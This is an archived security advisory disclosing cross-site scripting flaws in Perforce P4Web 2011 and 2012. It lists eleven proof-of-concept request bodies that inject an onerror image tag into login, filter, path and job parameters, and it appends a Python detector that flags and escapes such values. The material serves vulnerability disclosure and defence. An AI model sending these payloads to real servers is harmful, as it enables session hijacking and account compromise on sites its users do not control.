Perforce P4web 2011 / 2012 Web Client Cross Site Scripting

2013-01-22T00:00:00
ID PACKETSTORM:119737
Type packetstorm
Reporter Christy Philip Mathew
Modified 2013-01-22T00:00:00

Description

                                        
# Exploit Title: Perforce P4web 2011/2012 Web Client XSS Vulnerability  
# Date: 21 Jan 2013  
# Researcher: Christy Philip Mathew  
# Email: christypriory@gmail.com  
# Vendor or Software Link:  
  
http://filehost.perforce.com/perforce/r11.1/bin.ntx86/p4webinst.exe  
http://www.perforce.com/downloads/perforce/r12.1/bin.ntx86/p4webinst.exe  
  
# Version: P4Web/2011.1 & P4Web/2012.1  
# Category: local  
  
Perforce P4Web 2011.1 and 2012.1 have cross-site scripting (XSS) vulnerabilities in the web client  
that attackers can actively exploit. The affected requests and parameters are listed below.  
  
*Perforce P4Web 2011 POC Video:* http://www.youtube.com/watch?v=NXrBBYODpPI  
  
*Perforce P4Web 2012 POC Video:* http://www.youtube.com/watch?v=69nRlTo4aT0  
  
  
*Perforce P4web 2011 POC: Live HTTP Header POST Content*  
  
1. Client Name XSS  
  
u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=  
  
2. Client Filter  
  
cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
3. User XSS  
  
http://localhost:8080/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81  
  
4. User Filter XSS  
  
unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
  
5. Depot Tree XSS  
  
filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter  
  
6. Path XSS  
  
goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go  
  
  
7. Branches Filter XSS  
  
bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
8. Labels XSS  
  
lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
  
9. Job View XSS  
  
Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter  
  
10. Jobs Filter  
  
Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter  
  
11. Change List Filter XSS  
  
UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter  
  
  
12. UserAgent XSS  
  
  
  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
Regards,  
  
*Christy Philip Mathew*  
Information Security Researcher  
Website: Offcon Info Security <http://www.offcon.org>  
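Added example, not part of the original advisory or of Perforce's code: a Python check that decodes a captured form body, flags every parameter whose value closes an HTML attribute and opens a tag with an inline event handler (the shape shared by the values listed above), and returns those values HTML-escaped. The names `flag_params` and `BREAKOUT` and the benign sample body are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# A quote or '>' that closes the surrounding attribute/tag, followed by a new
# element carrying an inline event handler (on...=), as in the values above.
BREAKOUT = re.compile(r'["\'>]\s*<\s*[a-z][^>]*\son\w+\s*=', re.IGNORECASE)


def flag_params(body):
    """Map each suspicious parameter to its values, HTML-escaped for display."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if BREAKOUT.search(value):
            # html.escape(quote=True) is also the encoding that keeps such a
            # value inside the quoted attribute it is echoed into.
            hits.setdefault(name, []).append(html.escape(value, quote=True))
    return hits


# Encoded value shared by the advisory's POST bodies.
P = "%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E"
JOB_VIEW = f"Filter=+{P}&Asc=hi&Max=25&Show=Filter"            # item 9
USER_FILTER = (f"unm={P}&Updated=after&udu={P}"
               f"&Accessed=after&uda={P}&Show=Filter")           # item 4
BENIGN = "Filter=status%3Dopen&Asc=hi&Max=25&Show=Filter"        # constructed

if __name__ == "__main__":
    for label, body in [("job view", JOB_VIEW),
                        ("user filter", USER_FILTER),
                        ("benign", BENIGN)]:
        print(label, flag_params(body))
```

The pattern only recognises this advisory's value shape, so it suits log triage; the fix on the server side is HTML-encoding each echoed parameter, which the escaped output illustrates.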